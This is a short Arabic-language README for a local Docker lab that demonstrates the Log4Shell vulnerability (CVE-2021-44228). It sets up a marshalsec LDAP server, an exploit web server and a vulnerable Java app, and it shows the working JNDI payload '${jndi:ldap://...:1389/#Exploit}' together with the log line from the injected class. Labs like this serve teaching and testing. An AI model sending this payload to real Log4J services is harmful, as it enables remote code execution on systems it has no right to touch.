CVE-2021-44228_Example
قم بتشغيل كل قسم من الأقسام الثلاثة في علامة تبويب/وحدة تحكم منفصلة
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec
خادم الويب الخاص بالاستغلال
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit
تطبيق Java الخاص بـ Guinea Pig (يشغّل إصدارات ضعيفة من Java وLog4J)
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig
عند تشغيل guinea_pig يجب أن تشاهد ما يلي مسجلاً في السجل:
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}
يتم تسجيل "PWND!" من صنف محقون خارجياً (Exploit)